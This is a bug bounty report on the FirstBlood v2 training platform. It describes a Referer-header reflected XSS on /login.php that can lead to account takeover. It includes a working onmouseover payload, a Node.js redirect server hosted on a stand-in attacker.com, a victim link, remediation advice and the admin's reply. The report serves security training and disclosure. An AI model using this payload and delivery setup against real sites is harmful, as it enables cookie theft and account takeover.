FirstBlood-#637Referer Based XSS on /login.php endpoint leading to ATO
This issue was discovered on FirstBlood v2



On 2021-10-26, holybugx Level 5 reported:

Description

Hello Sean,

The /login.php endpoint is vulnerable to Referer-based XSS which leads to account takeover. Previously there was an XSS possibility on this endpoint using the ref parameter. The developer properly fixed that vulnerability. However this time, the Referer header is reflected without sanitization on the /login.php endpoint, which results in another XSS.

Steps To Reproduce

  1. Open the /login.php endpoint and click Secure Login, and you will face the Return to previous page button:

  1. Use the following payload as the Referer header value, and observe the response:
'onmouseover=alert(document.cookie)//

The Referer value is reflected without proper sanitization in the source code. Hover your mouse over on the Return to previous page and XSS executes:

Exploitation

As this is a Referer based XSS, the exploitation scenario is different. The attacker hosts the following Node.js code on his server:

const express = require('express');

const app = express();

app.get('*', (req, res) => {
  res.set('Referrer-Policy', 'unsafe-url');
  res.set('Content-Type', 'text/html');
  res.end('<script>location.replace("target-url");</script>');
});

app.listen(80);

Then the attacker gives the following link to the victim:

http://attacker.com/test'onmouseover=alert(document.cookie)//
  • The server handles the requests and response with <script>location.replace("target")</script>.
  • In the redirect request the referer will be set to http://attacker.com/test'onmouseover=alert(document.cookie)//
  • The referer-policy is needed because modern browsers don't pass referer with a path by default (only origin) for cross-domain navigation.

After the victim hovers the mouse over the Return to previous page, the XSS executes.

Impact

  • XSS leading to various user's account takeover.

Remediation

  • Implement proper sanitization of the Referer header.
  • Set httponly cookies so that javascript can not access the cookies.
  • Remove/Expire the drps cookies after logging out.

Kind Regards,

HolyBugx

P3 Medium

Parameter:

Payload:


FirstBlood ID: 19
Vulnerability Type: Reflective XSS

The parameter ?ref= on login.php was fixed and instead the use of $_SERVER['HTTP_REFERER']; was used. Patrice tested in Chrome and Firefox and saw it was secure, but some users still use Internet Explorer 10 (governments for example!) and the Referer header is vulnerable to reflective XSS.

Report Feedback

@zseano

Creator & Administrator


Nice find, thanks for providing a working PoC. Actually though from my testing I am only able to reproduce this on IE and the ' character is encoded for me on latest versions of Firefox and Chrome